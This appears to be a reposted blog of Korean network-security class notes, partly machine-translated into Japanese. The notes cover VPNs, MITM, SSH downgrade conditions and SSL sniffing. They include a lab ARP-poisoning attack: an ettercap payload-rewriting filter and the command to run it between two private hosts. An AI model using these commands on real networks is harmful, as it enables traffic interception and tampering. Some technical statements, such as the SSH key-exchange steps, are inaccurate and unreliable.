43日目ネットワークトレーニング(2022.03.04)
2980 ワード
Internal Network
- 기업 내부에서 데이터 통신을 하기 위한 네트워크
- 회사 내의 데이터 통신은 인터넷과 구분된 별도의 임대 회선(Leased Line) 사용
- 가격이 고가인 것이 단점
-> 임대 회선과 비슷한 수준의 기밀성을 제공하려면 VPN 사용 및 암호화 필요.
VPN에서 사용하는 암호화 프로토콜은 PPTP,L2TF,IPSec,SSL 등이 있음.
MITM(ManIn The Middle)攻撃
- 글자 그대로 누군가의 사이에 끼어드는 것
- 클라이언트와 서버의 통신에 암호화된 채널을 이용하면서 ARP 리다이렉트와
- ICMP 리다이렉트, ARP 스푸핑이 무용지물이 되자, 이를 극복하기 위해 탄생
- MITM은 패킷 내용을 바꾸기 시도
SSH暗号化技術
1단계 : 클라이언트가 ssh를 통해 ssh서버에 접근하여 서버의 공개키를 받음
2단계 : 클라이언트는 자신의 사설 키로 데이터를 암호화하고,
이를 다시 서버의 공개키로 암호화하여 서버로 전송
3단계 : 해당 서버에 접속할 때마다 서버로부터 전달받은 공개 키가 클라이언트에 저장되어 있는 키와 같은 값인지를 검증
SSH MITM (SSH Downgrade Attack)
SSHバージョン
v1 : 암호화를 제공하고 있으나, 암호화가 완전히 이루어지기 전 취약한 부분이 존재
v2 : 디피-헬만 암호화 알고리즘 등을 통해서 초기 암호화 과정의 취약점을 제거
SSHバージョンの決定時のカウント
1.サーバはv 2のみを使用する(プロトコル2)
- 클라이언트가 v2만 지원할 경우 : v2으로 연결
- 클라이언트가 v1,v2를 모두 지원할 경우 : v2으로 연결
- 클라이언트가 v1만 지원할 경우 : 연결 불가능
=> SSH Downgrade Attack은 불가능
2.サーバがv 1、v 2を同時にサポートしている場合(プロトコル2、1)
- 클라이언트가 v2만 지원할 경우 : v2으로 연결
- 클라이언트가 v1,v2를 모두 지원할 경우 : 우선순위에 따라 결정(일반적으로 v2사용)
- 클라이언트가 v1만 지원할 경우 : v1으로 연결
=> SSH Downgrade Attack 가능
3.サーバはv 1のみを使用する(プロトコル1)
- 클라이언트가 v2만 지원할 경우 : 연결 불가능
- 클라이언트가 v1,v2를 모두 지원할 경우 : v1으로 연결
- 클라이언트가 v1만 지원할 경우 : v1으로 연결
=> SSH Downgrade Attack 불필요
MITM攻撃を実行
cd/usr/local/share/ettercap/
vi etter.test1
# replace hello msg to merong
if (ip.proto == TCP && tcp.src == 7777) {
replace("hello", "merong");
msg("Message changed");
}
フィルタ変換
ettercap GUI 모드 실행
# ettercap -G
# etterfilter -o test1.ef etter.test1
Kali : nc -lvp 7777
centos : nc 192.168.100.128 7777
backtrack :
필터에 따른 MITM 공격 수행
ettercap -T -q -F test1.ef -M ARP /192.168.100.128/ /192.168.100.129/
SSL
넷 스케이프사가 개발한 것으로 40비트와 128비트 암호화 통신 가능
1. 클라이언트는 서버에서 지원 가능한 방식(암호, 키 교환, 서명, 압축)을 알려줌
2. 서버는 클라이언트에게 지원가능한 방식이 포함된 서버 인증서를 클라이언트에게 발송
3. 서버가 클라이언트 인증서를 요구할 경우 클라이언트는 인증서를 서버로 전송
4. 암호화키로 사용될 세션키를 랜덤으로 생성하고 서버의 공개키로 암호화한 후 서버로 전송
5. 서버는 클라이언트에게 전송받은 세션키 복호화
6. 클라이언트는 전송된 모든 메시지에 대한 방식을 다음부터 적용할 것을 알리는 종결 메시지를 발송한 후 데이터 전송 단계로 이동
SSLリスニング
- 공격자는 임의의 인증서를 생성한 뒤 클라이언트에게 보내 별도의 SSL 세션을 생성하고, 이를 중간에 스니핑 한다.
Reference
この問題について(43日目ネットワークトレーニング(2022.03.04)), 我々は、より多くの情報をここで見つけました https://velog.io/@hoon13/네트워크교육-43일차-2022.03.04テキストは自由に共有またはコピーできます。ただし、このドキュメントのURLは参考URLとして残しておいてください。
Collection and Share based on the CC Protocol